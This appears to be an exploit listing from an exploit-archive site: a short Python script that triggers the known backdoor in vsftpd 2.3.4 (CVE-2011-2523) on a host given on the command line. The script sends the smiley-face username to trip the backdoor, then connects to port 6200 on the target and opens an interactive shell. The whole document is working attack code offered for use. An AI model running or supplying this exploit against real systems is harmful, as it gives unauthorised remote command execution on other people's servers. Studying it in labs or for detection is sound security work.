Exploit for vsftpd 2.3.4 Backdoor Command Execution CVE-2011-2523

## https://sploitus.com/exploit?id=PACKETSTORM:162145
# Exploit Title: vsftpd 2.3.4 - Backdoor Command Execution  
# Date: 9-04-2021  
# Exploit Author: HerculesRD  
# Software Link: http://www.linuxfromscratch.org/~thomasp/blfs-book-xsl/server/vsftpd.html  
# Version: vsftpd 2.3.4  
# Tested on: debian  
# CVE : CVE-2011-2523  
  
#!/usr/bin/python3   
  
from telnetlib import Telnet   
import argparse  
from signal import signal, SIGINT  
from sys import exit  
  
def handler(signal_received, frame):  
# Handle any cleanup here  
print(' [+]Exiting...')  
exit(0)  
  
signal(SIGINT, handler)   
parser=argparse.ArgumentParser()   
parser.add_argument("host", help="input the address of the vulnerable host", type=str)  
args = parser.parse_args()   
host = args.host   
portFTP = 21 #if necessary edit this line  
  
user="USER nergal:)"  
password="PASS pass"  
  
tn=Telnet(host, portFTP)  
tn.read_until(b"(vsFTPd 2.3.4)") #if necessary, edit this line  
tn.write(user.encode('ascii') + b"\n")  
tn.read_until(b"password.") #if necessary, edit this line  
tn.write(password.encode('ascii') + b"\n")  
  
tn2=Telnet(host, 6200)  
print('Success, shell opened')  
print('Send `exit` to quit shell')  
tn2.interact()